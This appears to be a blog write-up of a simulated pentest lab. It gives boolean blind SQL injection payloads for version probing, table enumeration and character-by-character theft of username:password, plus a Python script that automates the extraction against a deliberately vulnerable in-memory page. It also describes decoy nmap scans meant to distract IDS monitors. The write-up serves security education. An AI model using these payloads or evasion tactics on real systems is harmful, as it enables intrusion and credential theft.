Going Blind and finding your way
The assignment is as follows. You are required to conduct a pentest on a client's simulated research and development lab environment. During the briefing you get to interact with the network administrator, who happens to be a Cisco Expert and Snort Certified Professional and who has set up the militarized test environment with state-of-the-art security defence mechanisms. Moreover, you learn that they recently installed a web-based firewall. You are required to compromise the installation so that the organisation can secure itself against future risk exposures.
Deliverable:Own the BOX
ssvforensic labs: tool kit for this operation, not limited to:
- Case: Undisclosed company Y
- 411 about the firm: ERP software development
- Mission: Pita_Katikati_Yao
- Objective: Pawn and Own
- RV choice: Kali Linux [Burp Suite/ZAP, SQL cheat-sheet, web shell, hosting, tcpdump and FireBug]
POC samples below.
SAMPLE OF THE THEORETICAL POC METHODOLOGY
The tactics and strategies used by a Shaolin disciple in combat are intelligent applications of principles generalised by some of the best warriors of the past.
This is synonymous with **Ancient Principles for future Battle Fields**, the BackTrack mantra. The below can be summarised as the five rules of thumb for any white hat, black hat or grey hat, not forgetting our RedHat buddies from Odays ago; the Oracle is listening...
RULES OF THUMB
- Signal to the East, strike to the West;
- Avoid an opponent's strong points, strike the weak ones;
- Trick an opponent into advancing without success;
- If an opponent is strong, enter from the side; if weak, enter from the front;
- USE MINIMUM FORCE to neutralize maximum strength.
Layered defence approach adopted versus a potential threat via SQL injection
SAMPLE OF THE THEORETICAL SETUP METHODOLOGY
After careful assessment (rules 2 and 4), going for the web server was more logical than the other options, which were heavily monitored. To distract the technical team monitoring the systems, we install four custom VM setups (we discuss only two, for reasons known to us): one host-based and one with a "custom virtual network", to be used as decoys when running the automated nmap scan. We deliberately do not run nmap in stealth-scan mode, and we set -p to 1-65500, the aim being to make the administrators pay more attention to the IPS and IDS (rule 1). We also create a cron job on one of the VMs so that our bash script loops through other scans as well as nmap (rule 3).
SAMPLE OF THE BLIND SQL INJECTION POC
Using rule 5, a sample of the blind SQL injections used to own the box. The injected condition is appended to the vulnerable parameter of the page:
http://xxxxxxxxxxx/ and 1=1
and 1=2 <--- Boolean false: the page does not load normally
and 1=1 <--- Boolean true: the page loads
The MySQL version is 5. To get the version in a blind attack we use substring, comparing one character at a time:
http://xxxxxxxxxxx/and substring(@@version,1,1)=5
To enumerate database tables and columns we use limit 0,1 (with the table you are guessing in place of mysql.table):
http://xxxxxxxxxxx/and (select 1 from mysql.table limit 0,1)=1
The condition is true only when the guessed table exists and has a row, since the sub-select returns exactly one row; if the table does not exist the query errors and the page behaves as in the false case.
We repeat the same method to discover further tables and columns.
Pulling characters from the users table:
ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>80
When > 0 returns false we know we have reached the end of the string, because ascii() of an empty substring is 0. We then use an ASCII converter to turn the recovered codes back into letters.
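The extraction above is done by hand, one comparison at a time. The script below, added here as an illustration and not part of the original write-up, automates the same boolean oracle: it builds a small vulnerable page in-memory (SQLite, with MySQL-style ascii(), substring() and concat() registered so the write-up's payloads run unchanged; the users table and its admin row are constructed sample data), confirms the 1=1 / 1=2 baseline, probes for a table with the limit 0,1 trick, and then pulls each character of username:password with a binary search over the ascii() comparison instead of guessing thresholds like >80. The stop condition is the one the text describes: ascii() of the character past the end is 0. The only departure is concat(username,':',password) in place of 0x3a, because SQLite reads 0x3a as the integer 58.

```python
"""Automated boolean-based blind SQL injection against a simulated vulnerable page.

Added example: the target, the helper functions and the sample rows are
constructed here so the script runs offline; they are not from the original post.
"""
import sqlite3


def _setup_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    # MySQL-compatible helpers so the write-up's payloads work on SQLite:
    # ascii('') is 0 and substring() past the end of a string is '' as in MySQL.
    conn.create_function("ascii", 1, lambda s: ord(s[0]) if s else 0)
    conn.create_function("substring", 3, lambda s, p, n: (s or "")[p - 1:p - 1 + n])
    conn.create_function("concat", -1, lambda *a: "".join(str(x) for x in a))
    conn.execute("CREATE TABLE news(id INTEGER, body TEXT)")
    conn.execute("INSERT INTO news VALUES (1, 'welcome')")
    conn.execute("CREATE TABLE users(username TEXT, password TEXT)")
    # constructed sample data
    conn.execute("INSERT INTO users VALUES ('admin', 's3cret')")
    return conn


CONN = _setup_db()


def page_loads(injected: str) -> bool:
    """The vulnerable endpoint: attacker input is concatenated into the query.

    Returns True when the page renders (a row came back) and False when the
    WHERE clause is false or the query errors, which is all the attacker sees.
    """
    sql = "SELECT body FROM news WHERE id=1 " + injected   # deliberately vulnerable
    try:
        return CONN.execute(sql).fetchone() is not None
    except sqlite3.Error:
        return False


def table_exists(table: str) -> bool:
    """The write-up's limit 0,1 probe: true only if the table exists and has a row."""
    return page_loads(f"and (select 1 from {table} limit 0,1)=1")


def extract(subquery: str, max_len: int = 64) -> str:
    """Recover the scalar result of `subquery` one character at a time.

    For each position, first check ascii(...)>0 (end-of-string test), then
    binary-search the code point in [1, 127] with ascii(...)>mid comparisons.
    """
    out = ""
    for pos in range(1, max_len + 1):
        probe = f"and ascii(substring(({subquery}),{pos},1))>{{}}"
        if not page_loads(probe.format(0)):
            break                       # ascii('') == 0: past the end of the string
        lo, hi = 1, 127                 # invariant: the true code point is in [lo, hi]
        while lo < hi:
            mid = (lo + hi) // 2
            if page_loads(probe.format(mid)):
                lo = mid + 1            # character > mid
            else:
                hi = mid                # character <= mid
        out += chr(lo)
    return out


if __name__ == "__main__":
    assert page_loads("and 1=1") and not page_loads("and 1=2")   # baseline oracle
    print("users table present:", table_exists("users"))
    print(extract("SELECT concat(username,':',password) FROM users LIMIT 0,1"))
```

Each recovered character costs about eight requests (one end test plus seven comparisons), so a dozen characters is roughly a hundred page loads; on a real target that traffic is exactly what the IDS the administrator is watching will see, which is why the decoy scans in the setup section matter.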
Conclusions
According to the OWASP Top 10 2013, injection is the number one threat facing systems. Below is an illustration of injection flaws and their impact on the business.
For security analysts and penetration testers, OWASP provides a testing framework as a baseline, the OWASP Testing Guide, to help developers, testers and application security specialists understand how to efficiently and effectively test the security of web applications.
Application pentesters wanting to get their hands dirty should try Mutillidae and Burp Suite as a test environment, and the rest, as they say, is history. I wish to remind you that as a security analyst you should seek to provide an acceptable level of security for your client, while emphasising that the word "secure" does not exist in our current world.
Special thanks: credits for reference to OWASP and Sun Tzu (The Art of War), my de facto mentor.